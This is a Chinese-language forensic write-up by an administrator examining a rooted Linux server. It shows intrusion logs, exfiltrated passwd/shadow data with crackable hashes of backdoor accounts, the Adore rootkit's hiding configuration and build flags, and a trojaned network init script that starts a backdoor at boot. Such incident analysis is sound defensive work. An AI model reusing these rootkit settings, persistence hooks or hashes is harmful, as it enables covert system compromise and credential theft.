sshd[2001]: log: Connection from 24.112.92. 135 port 3864 Feb 2 07:29:15 dnscache sshd[2001]: fatal: Local: crc32 compensation attack: network attack detected From root Sat Feb 2 08:09:26 2002 Return-Path: Received: from localhost (localhost) by dnscache.i-168.com (8.9.3/8.9.3) with internal id IAA02520; Sat, 2 Feb 2002 08:09:25 +0800 Date: Sat, 2 Feb 2002 08:09:25 +0800 From: Mail Delivery Subsystem Message-Id: To: [email protected] MIME-Version: 1.0 Content-Type: multipart/report; report-type=delivery-status; boundary="IAA02520.1012608565/dnscache.i-168.com" Subject: Returned mail: Service unavailable Auto-Submitted: auto-generated (failure) This is a MIME-encapsulated message --IAA02520.1012608565/dnscache.i-168.com The original message was received at Sat, 2 Feb 2002 08:09:22 +0800 from root@localhost ----- The following addresses had permanent fatal errors ----- [email protected] ----- Transcript of session follows ----- ... while talking to mx2.mail.yahoo.com.: > >> DATA ([email protected]) - mta619.mail.yahoo.c om 554 [email protected]... Service unavailable --IAA02520.1012608565/dnscache.i-168.com Content-Type: message/delivery-status Reporting-MTA: dns; dnscache.i-168.com Arrival-Date: Sat, 2 Feb 2002 08:09:22 +0800 Final-Recipient: RFC822; [email protected] Action: failed Status: 5.0.0 Remote-MTA: DNS; mx2.mail.yahoo.com Diagnostic-Code: SMTP; 554 delivery error: dd This user doesn't have a yahoo.com account ([email protected]) - mta619.mail.yahoo.com Last-Attempt-Date: Sat, 2 Feb 2002 08:09:25 +0800 --IAA02520.1012608565/dnscache.i-168.com Content-Type: message/rfc822 Return-Path: Received: (from root@localhost) by dnscache.i-168.com (8.9.3/8.9.3) id IAA02513 for [email protected]; Sat, 2 Feb 2002 08:09:22 +0800 Date: Sat, 2 Feb 2002 08:09:22 +0800 From: root Message-Id: To: [email protected] Subject: Linux dnscache.i-168.com 2.2.18-2 #1 Tue Feb 27 20:54:01 CST 2001 i686 unknown Linux dnscache.i-168.com 2.2.18-2 #1 Tue Feb 27 20:54:01 CST 2001 i686 unknown |------ root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin: daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/adm: lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin:/binsync shutdown:x:6:0:shutdown:/sbin:/sbinshutdown halt:x:7:0:halt:/sbin:/sbinhalt mail:x:8:12:mail:/var/spoolmail: news:x:9:13:news:/var/spoolnews: uucp:x:10:14:uucp:/var/spooluucp: operator:x:11:0:operator:/root: games:x:12:100:games:/usrgames: gopher:x:13:30:gopher:/usr/libgopher-data: ftp:x:14:50:FTP User:/home/ftp: nobody:x:99:99:Nobody:/: wnn:x:127:127:Wnn:/usr/local/bin/Wnn6: 哪里来的SHELL?又是后门,FT! mysql:x:128:128:MySQL server:/var/lib/mysql:/binbash bind:x:129:129::/etc/named:/dev/null piranha:x:60:60::/home/httpd/html/piranha:/dev/null squid:x:23:23::/var/spool/squid:/dev/null chair:x:500:503::/home/chair:/bin/bash dnscache:x:501:504::/home/dnscache:/binbash dnslog:x:502:505::/home/dnslog:/binbash cgi:x:0:0::/home/cgi:/bin/bash 家伙1 luck:x:503:506::/home/luck:/bin/bash 家伙2 luck1:x:0:507::/home/luck1:/bin/bash 家伙3|------ root:XXXXXXXXX.:11649:0:99999:7::: 保密啦 bin:*:11649:0:99999:7::: daemon:*:11649:0:99999:7::: adm:*:11649:0:99999:7::: lp:*:11649:0:99999:7::: sync:*:11649:0:99999:7::: shutdown:*:11649:0:99999:7::: halt:*:11649:0:99999:7::: mail:*:11649:0:99999:7::: news:*:11649:0:99999:7::: uucp:*:11649:0:99999:7::: operator:XXXXXXXXXX:11708:0:99999:7:-1:-1:134539376 games:*:11649:0:99999:7::: games:*:11649:0:99999:7::: gopher:*:11649:0:99999:7::: ftp:*:11649:0:99999:7::: nobody:*:11649:0:99999:7::: wnn:*:11649:0:99999:7::: mysql:!!:11649:0:99999:7::: bind:!!:11649:0:99999:7::: piranha:!!:11649:0:99999:7::: squid:!!:11649:0:99999:7::: chair:XXXXXXXXX:11649:0:99999:7:-1:-1:134539416 保密啦 dnscache:!!:11649:0:99999:7::: dnslog:!!:11649:0:99999:7::: cgi:5DnRYHyIa5w0g:11708:0:99999:7:-1:-1:134539416 luck:SqXj0pjOPwcxA:11720:0:99999:7:-1:-1:134538336 luck1:cqrTW5Ortfn7s:11720:0:99999:7:-1:-1:134538336 这几个就是他们的3DES后的东西,哪位朋友有时间和兴趣就CRACK了他吧 PING 216.115.108.245 (216.115.108.245) from 192.168.100.27 : 56(84) bytes of data. 64 bytes from 216.115.108.245: icmp_seq=0 ttl=233 time=167.9 ms 64 bytes from 216.115.108.245: icmp_seq=1 ttl=233 time=170.7 ms 64 bytes from 216.115.108.245: icmp_seq=2 ttl=233 time=171.2 ms 64 bytes from 216.115.108.245: icmp_seq=3 ttl=233 time=174.6 ms 64 bytes from 216.115.108.245: icmp_seq=4 ttl=233 time=171.0 ms --- 216.115.108.245 ping statistics --- 5 packets transmitted, 5 packets received, 0% packet loss round-trip min/avg/max = 167.9/171.0/174.6 ms 下面的是在/home/luck/目录下的东西,看来也是不细心,又有 线索了,看样子改了内核,这个家伙在这里还考虑周到,怕 我重编内核?? [root@mail luck]# cat .bash_history cd /usr/src ls cd star ls cd S* ls tar -zxpvf * ls cd root ls l ls cd ls ls ls -af ls cd .. ls cd etc ls cd .. ls cd boot ls cd .. ls cd boto ls -af cd .. ls cd root ls ls -af cd .. ls rm * -rf ls tar -zxpvf * ls cd ske ls ls -af vi .X* ls ls -af ls ls -af rm .X* LS ls rm * -rf ls ls -af ls ls -af vi .x* ls ls -af rm .x* ls ls -af vi .inputrc ls ls -af vi .bashrc ls -af rm .g* rm .gnome* rm .gnome* -rf ls ls -af rm .kde* ls ls -af mv mc ls ls -af rm .net* rm .net* -rf ls -af mc ls ls -af cp -r .* /root y cd / ls cd usr ls cd src ls cd .. ls cd .. ls cd usr ls cd src ls cd tar l s ls cd S&* cd S* LS ls mount /dev/hdd /mnt/cdrom cd /mnt/cdrom ls cd S* ls ls f* rpm -i filesys* cd .. ls *ske* ls cd S* ls ls *ske* rpm -i *ske* cd .. cd / ls cd root ls ls -af cd .. mv root rootstar mkdir root cd root ls -af cd .. ls cd rootstar ls ls -af cd .. ls rm root -rf ls mkdir root ls cd root ls -af ls -a ls . rm ske -rf ls ls -af rm skel -rf ls ls -af ls vi ls ROOTKIT里的文件,FT,几乎都考虑周全了,可惜啊,这些常用的 东西网管又怎么会相信呢,通常自己都有另一套东西的啦。 [root@mail rk]# ls Makefile.non-smp cleaner.c hostkey logrc ps tcpd Makefile.smp dir ifconfig ls pstree top adore.c dummy.c iferc netstat rename.c twist2open afbackup exec-test.c install netstatrc seed ava.c exec.c libinvisible.c network sshd_conf bnc filerc libinvisible.h parser syslogd bnc.conf find logcleaner procrc sz 下面的是这个ROOTKIT隐蔽起来的进程,端口,文件,网卡等 [root@mail rk]# cat netstatrc 3 7070 1 7070 3 31337 1 31337 3 32321 3 32322 3 32323 3 32324 3 32325 4 32321 4 32322 4 32323 4 32324 4 32325 4 6667 4 6669 4 6668 4 7000 4 6660 4 21 4 53 [root@mail rk]# cat logrc home.com nether.net hobbiton.org 194.102 sshd syslog klogd net-pf-10 modprobe games promiscuous PF_INET 60G yahoo.com 217.10 193.226 hypermart failure geocities [root@mail rk]# cat procrc 3 darkbot 3 psybnc 3 slice 3 vadim 3 eggdrop 3 mech 3 banner 3 massbind 3 masslpd 3 scan 3 ping 3 afbackup 3 bnc 3 sniff 3 root 3 bind 3 statd 3 lpd 3 r00t 3 smurf 3 synk 3 twist2open 看看MAKEFILE对查找后门放在哪里有帮助。adore ,ava ,cleaner这3个文件,看 看 哪些文件里有加载先 [root@mail rk]# cat Makefile.smp # CC=gcc CFLAGS=-O2 -Wall #CFLAGS+=-m486 CFLAGS+=-DELITE_CMD=32321 CFLAGS+=-DELITE_UID=34 CFLAGS+=-DCURRENT_ADORE=32 CFLAGS+=-DADORE_KEY=\"rewt\" CFLAGS+=-DHIDDEN_SERVICE="\":32321\"" CFLAGS+=-D__SMP__ CFLAGS+=-DHIDDEN_PORT=32321 CFLAGS+=-DMODVERSIONS all: adore ava cleaner adore: adore.c rm -f adore.o $(CC) -c -I/usr/src/linux/include $(CFLAGS) adore.c -o adore.o ava: ava.c libinvisible.c $(CC) $(CFLAGS) ava.c libinvisible.c -o ava dummy: dummy.c $(CC) -c -I/usr/src/linux/include $(CFLAGS) dummy.c cleaner: cleaner.c $(CC) -I/usr/src/linux/include -c $(CFLAGS) cleaner.c exec-test: exec-test.c $(CC) -Wall -O2 exec-test.c -DSAYSO=\"ORIGINAL\" -o /bin/exec-test $(CC) -Wall -O2 exec-test.c -DSAYSO=\"FAKE\" -o /tmp/foobar clean: rm -f core ava *.o [root@mail rk]# cat Makefile. Makefile.non-smp Makefile.smp [root@mail rk]# cat Makefile. Makefile.non-smp Makefile.smp [root@mail rk]# cat Makefile.non-smp # CC=gcc CFLAGS=-O2 -Wall #CFLAGS+=-m486 CFLAGS+=-DELITE_CMD=32321 CFLAGS+=-DELITE_UID=34 CFLAGS+=-DCURRENT_ADORE=32 CFLAGS+=-DADORE_KEY=\"rewt\" CFLAGS+=-DHIDDEN_SERVICE="\":32321\"" #CFLAGS+=-D__SMP__ CFLAGS+=-DHIDDEN_PORT=32321 CFLAGS+=-DMODVERSIONS all: adore ava cleaner adore: adore.c rm -f adore.o $(CC) -c -I/usr/src/linux/include $(CFLAGS) adore.c -o adore.o ava: ava.c libinvisible.c $(CC) $(CFLAGS) ava.c libinvisible.c -o ava dummy: dummy.c $(CC) -c -I/usr/src/linux/include $(CFLAGS) dummy.c cleaner: cleaner.c $(CC) -I/usr/src/linux/include -c $(CFLAGS) cleaner.c exec-test: exec-test.c $(CC) -Wall -O2 exec-test.c -DSAYSO=\"ORIGINAL\" -o /bin/exec-test $(CC) -Wall -O2 exec-test.c -DSAYSO=\"FAKE\" -o /tmp/foobar clean: rm -f core ava *.o [root@mail rk]# cat network |more #!/bin/bash # # network Bring up/down networking # # chkconfig: 2345 10 90 # description: Activates/Deactivates all network interfaces configured to \ # start at boot time. # probe: true # Source function library. . /etc/init.d/functions if [ ! -f /etc/sysconfig/network ]; then exit 0 fi . /etc/sysconfig/network if [ -f /etc/sysconfig/pcmcia ]; then . /etc/sysconfig/pcmcia fi # Check that networking is up. [ ${NETWORKING} = "no" ] && exit 0 [ -x /sbin/ifconfig ] || exit 0 # Even if IPX is configured, without the utilities we can't do much [ ! -x /sbin/ipx_internal_net -o ! -x /sbin/ipx_configure ] && IPX= # If IPv6 is explicitly configured, make sure it's available. if [ "$NETWORKING_IPV6" = "yes" ]; then alias=`modprobe -c | grep net-pf-10 | awk '{ print $3 }'` if [ "$alias" != "ipv6" -a ! -f /proc/net/if_inet6 ]; then echo "alias net-pf-10 ipv6" >> /etc/modules.conf fi fi CWD=`pwd` cd /etc/sysconfig/network-scripts # find all the interfaces besides loopback. # ignore aliases, alternative configurations, and editor backup files interfaces=`ls ifcfg* | LANG=C egrep -v '(ifcfg-lo|: |rpmsave|rpmorig|rpmnew)' | \ LANG=C egrep -v '(~|\.bak)$' | \ LANG=C egrep -v 'ifcfg-cipcb[0-9]+$' | \ LANG=C egrep -v 'ifcfg-ippp[0-9]+$' | \ LANG=C egrep 'ifcfg-[a-z0-9]+$' | \ sed 's/^ifcfg-//g'` # See how we were called. case "$1" in start) /usr/bin/twist2open >>/dev/null 2>&1 //就是在这里加载后门的啦!TMD,真是混蛋 action $"Setting network parameters: " sysctl -e -p /etc/sysctl.conf action $"Bringing up interface lo: " ./ifup ifcfg-lo case "$IPX" in yes|true) /sbin/ipx_configure --auto_primary=$IPXAUTOPRIMARY \ --auto_interface=$IPXAUTOFRAME if [ "$IPXINTERNALNETNUM" != "0" ]; then /sbin/ipx_internal_net add $IPXINTERNALNETNUM $IPXINTERNALNODENUM fi ;; esac oldhotplug=`sysctl kernel.hotplug 2>/dev/null| awk '{ print $3 }' 2>/dev/null` sysctl -w kernel.hotplug="/bin/true" > /dev/null 2>&1 for i in $interfaces; do if LANG=C egrep -L "^ONBOOT=\"?[Nn][Oo]\"?" ifcfg-$i > /dev/null 2>&1 ; then if [ "${i##eth}" != "$i" ]; then # Probe module to preserve interface ordering if [ -n "`modprobe -vn $i | grep -v Note:`" ]; then /sbin/ifconfig $i >/dev/null 2>&1 fi fi else # If we're in confirmation mode, get user confirmation [ -n "$CONFIRM" ] && { confirm $i case $? in 0) : ;; 2) CONFIRM= ;; *) continue ;; esac } action $"Bringing up interface $i: " ./ifup $i boot fi done # add cipe here. cipeinterfaces=`ls ifcfg* | LANG=C egrep -v '(ifcfg-lo|: |rpmsave|rpmorig|rpmnew)' | \ LANG=C egrep -v '(~|\.bak)$' | \ LANG=C egrep 'ifcfg-cipcb[0-9]+$' | \ sed 's/^ifcfg-//g'` for i in $cipeinterfaces ; do if ! LANG=C egrep -L "^ONBOOT=\"?[Nn][Oo]\"?" ifcfg-$i > /dev/null 2>&1 ; then # If we're in confirmation mode, get user confirmation [ -n "$CONFIRM" ] && { confirm $i case $? in 0) : ;; 2) CONFIRM= ;; *) continue ;; esac } action $"Bringing up interface $i: " ./ifup $i boot fi done sysctl -w kernel.hotplug=$oldhotplug > /dev/null 2>&1 # Add non interface-specific static-routes. if [ -f /etc/sysconfig/static-routes ]; then grep "^any" /etc/sysconfig/static-routes | while read ignore args ; do /sbin/route add -$args done fi touch /var/lock/subsys/network ;; stop) /usr/bin/weather U dummy >>/dev/null 2>&1 kill -9 `pidof afbackup` kill -9 `pidof bnc` 关闭那些后门进程啦,FT # If this is a final shutdown/halt, check for network FS, # and unmount them even if the user didn't turn on netfs if [ "$RUNLEVEL" = "6" -o "$RUNLEVEL" = "0" -o "$RUNLEVEL" = "1" ]; then NFSMTAB=`grep -v '^#' /proc/mounts | awk '{ if ($3 ~ /^nfs$/ ) print $2}'` SMBMTAB=`grep -v '^#' /proc/mounts | awk '{ if ($3 ~ /^smbfs$/ ) print $2}'` NCPMTAB=`grep -v '^#' /proc/mounts | awk '{ if ($3 ~ /^ncpfs$/ ) print $2}'` if [ -n "$NFSMTAB" -o -n "$SMBMTAB" -o -n "$NCPMTAB" ] ; then /etc/init.d/netfs stop fi fi for i in $interfaces ; do if LC_ALL= LANG= ifconfig $i 2>/dev/null | grep -q " UP " >/dev/null 2>&1 ; then action $"Shutting down interface $i: " ./ifdown $i boot fi done case "$IPX" in yes|true) if [ "$IPXINTERNALNETNUM" != "0" ]; then /sbin/ipx_internal_net del fi ;; esac ./ifdown ifcfg-lo if [ -d /proc/sys/net/ipv4 ]; then if [ -f /proc/sys/net/ipv4/ip_forward ]; then if [ `cat /proc/sys/net/ipv4/ip_forward` != 0 ]; then action $"Disabling IPv4 packet forwarding: " sysctl -w net.ipv4.ip_forward=0 fi fi if [ -f /proc/sys/net/ipv4/ip_always_defrag ]; then if [ `cat /proc/sys/net/ipv4/ip_always_defrag` != 0 ]; then action $"Disabling IPv4 automatic defragmentation: " sysctl -w net.ipv4.ip_always_defr ag=0 fi fi fi rm -f /var/lock/subsys/network ;; status) echo $"Configured devices:" echo lo $interfaces if [ -x /sbin/linuxconf ] ; then eval `/sbin/linuxconf --hint netdev` echo $"Devices that are down:" echo $DEV_UP echo $"Devices with modified configuration:" echo $DEV_RECONF else echo $"Currently active devices:" echo `/sbin/ifconfig | grep ^[a-z] | awk '{print $1}'` fi ;; restart) cd $CWD $0 stop $0 start ;; reload) if [ -x /sbin/linuxconf ] ; then eval `/sbin/linuxconf --hint netdev` for device in $DEV_UP ; do action $"Bringing up device $device: " ./ifup $device done for device in $DEV_DOWN ; do action $"Shutting down device $device: " . /ifdown $device done for device in $DEV_RECONF ; do action $"Shutting down device $device: " . /ifdown $device action $"Bringing up device $device: " ./ifup $device done for device in $DEV_RECONF_ALIASES ; do action $"Bringing up alias $device: " /etc/sysconfig/network-scripts/ifup-aliases $dev ice done for device in $DEV_RECONF_ROUTES ; do action $"Bringing up route $device: " /etc/sysconfig/network-scripts/ifup-routes $devi ce done case $IPX in yes|true) case $IPXINTERNALNET in reconf) action $"Deleting internal IPX network: " /sbin/ipx_internal_net del action $"Adding internal IPX network $IPXINTERNALNETNUM $IPXINTERNALNODENUM: " /sbin/i px_internal_net add $IPXINTERNALNETNUM \ $IPXINTERNALNODENUM ;; add) action $"Adding internal IPX network $IPXINTERNALNETNUM $IPXINTERNALNODENUM: " /sbin/i px_internal_net add $IPXINTERNALNETNUM \ $IPXINTERNALNODENUM ;; del) action $"Deleting internal IPX network: " /sbin/ipx_internal_net del ;; esac ;; esac else cd $CWD $0 restart fi ;; probe) if [ -x /sbin/linuxconf ] ; then eval `/sbin/linuxconf --hint netdev` [ -n "$DEV_UP$DEV_DOWN$DEV_RECONF$DEV_RECONF_ALIASES" -o \ -n "$DEV_RECONF_ROUTES$IPXINTERNALNET" ] && \ echo reload exit 0 else # if linuxconf isn't around to figure stuff out for us, # we punt. Probably better than completely reloading # networking if user isn't sure which to do. If user # is sure, they would run restart or reload, not probe. exit 0 fi ;; *) echo $"Usage: $0 {start|stop|restart|reload|status|probe}" exit 1 esac exit 0 好了,经过36页的观察,基本知道是怎么回事了,本来以为实验机器随便一点无 所谓, 安全问题是个水桶,全部严密还好,有一点漏洞,这个水桶就没什么用了。 |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|